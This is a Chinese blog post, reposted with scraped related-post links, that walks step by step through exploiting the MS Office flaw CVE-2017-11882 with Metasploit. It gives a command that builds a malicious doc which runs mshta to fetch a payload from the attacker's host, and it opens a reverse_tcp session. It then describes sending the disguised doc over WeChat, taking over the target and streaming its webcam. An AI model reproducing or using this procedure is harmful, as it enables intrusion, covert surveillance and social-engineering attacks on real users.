MSF渗透测试-CVE-2017-11882(MSOffice漏洞)
1.测试环境
2.测试前准备
3.测试过程
—3.1虚拟机环境测试
—3.2局域网靶机测试
4.测试感想
1.测试环境
攻击机:
OS:kail
IP:192.168.15.132/192.168.137.231
靶机:
OS:Windows7
Office版本:Office2013_CN
IP:
2.测试前准备
1.下载python
脚本
2.下载MSF
组件
3.将cve_2017_11882.rb
复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/
目录下
4.把下载的cve_2017_11882.rtf
复制到/usr/share/metasploit-framework/data/exploits/
目录下
5.把Command109b_CVE-2017-11882.py
复制到/root
目录下
3.测试过程
3.1虚拟机环境测试
1.msfconsole
执行search
命令
2.设置payload
为reverse_tcp
,设置LHOST
为192.168.15.132
,设置URIPATH
为test
(之后利用python
脚本生成doc文件的时候也要使用相同路径)
3.show options
显示设置
4.exploit -j
运行
5.另开一个terminal
,python Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc
6.把生成的kail_help
复制到靶机中打开,是个空白文档
7.回连成功
8.sessions -i 1
接管活动会话1,shell
可以看到已经成功渗透靶机
3.2局域网靶机测试
0.更改kail网络链接模式由NAT->桥接
,获得一个与靶机在同一网段下的IP192.168.137.231
1.更改一下LHOST
,重新生成一个doc文件,exploit -j
监听
2.将文件改名为kail_help2.doc
通过微信发给靶机(随便改啥,具有迷惑性就行)
3.靶机打开doc,Windows7防火墙处于打开状态,无杀软
4.攻击机获得回连,sessions -i 1
接管
5.webcam_stream
可以直接控制摄像头进行直播
6.shell
中获取靶机桌面信息
4.测试感想
- 前人栽树,后人乘凉。
github
和meterpreter-db
上有漏洞相关的msf模块
和python脚本
可以直接使用 - 老旧系统、软件十分不靠谱,易于攻入。其实还实践了
WindowsDefender+Windows10
的组合,WinodowsDefender
会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)
转载于:https://www.cnblogs.com/zl20154312/p/8877386.html
MSF渗透测试-CVE-2017-11882(MSOffice漏洞)相关推荐
- kail之MSF渗透测试
kail之MSF渗透测试实战 注:这是我从xmind笔记上导入过来的,排版可能没那么好,后期我会再整理,有什么意见问题大家可以留言或者私信 本文目录 kail之MSF渗透测试实战 kail问题解答及m ...
- 灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术(第3版)
基本信息 灰帽黑客:正义黑客的道德规范.渗透测试.攻击方法和漏洞分析技术(第3版)原书名: Gray Hat Hacking: The Ethical Hacker's Handbook, Third ...
- 渗透测试 对头像上传漏洞检测与修复
很多客户网站以及APP在上线运营之前都会对网站进行渗透测试,提前检测网站是否存在漏洞,以及安全隐患,避免因为网站出现漏洞而导致重大的经济损失,客户找到我们SINE安全做渗透测试服务的时候,我们都会对文 ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- MSF渗透测试android手机
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF渗透测试android手机. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调: ...
- 渗透测试基础-文件上传漏洞 (下)
渗透测试基础-文件上传漏洞 (下) 第十一题 %00截断绕过 第十二题 %00截断绕过(二) 第十三题 图片马绕过 第十四题 getimagesize图片类型绕过 第十五题 php_exif模块图片类 ...
- Metasploit(MSF)渗透测试框架使用教程及基本命令
第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍 Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一.使您能够 ...
- Kali Linux Web 渗透测试秘籍 第四章 漏洞发现
第四章 漏洞发现 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们现在已经完成了渗透测试的侦查阶段,并且识别了应用所使用的服务器和 ...
- web渗透测试----5、暴力破解漏洞--(6)VNC密码破解
文章目录 一.hydra 二.Medusa 三.Ncrack 四.Patator 五.Metasploit 虚拟网络控制台 (Virtual Network Console:VNC)是一款优秀的远程控 ...
最新文章
- word2vec_文本相似度
- opencv光流Optical Flow
- php 按 截取字符串,PHP按符号截取字符串的指定部分
- 报表建oracle表,建立Oracle report报表基本步骤及创建报表技巧
- windows分区给linux根目录,解决双系统安装Linux之后找不到Windows分区
- java值栈_Struts2 中的值栈是什么?
- Nginx站点缓存设置
- [Python] L1-029. 是不是太胖了-PAT团体程序设计天梯赛GPLT
- java 静态类实例_Java中多个类的静态实例?
- Java NIO之缓冲区Buffer
- GNS3 思科交换机配置三层转发
- r730 raid5 linux 驱动,Dell power edge R730 raid卡安装配置
- 智能厨房监控系统设计
- 记录华夏ERP配置报错
- Oracle ERP 仓库(inventory) 词汇1
- vue-awesome-swiper 设置autoHeight,最后不满一页也占了一页
- C# 零基础入门知识点汇总
- nginx正向代理https
- ERNIE,ERNIE2.0,Transformer-XL,XLNET
- 工程伦理--15.6 克隆技术和干细胞研究的伦理问题(下)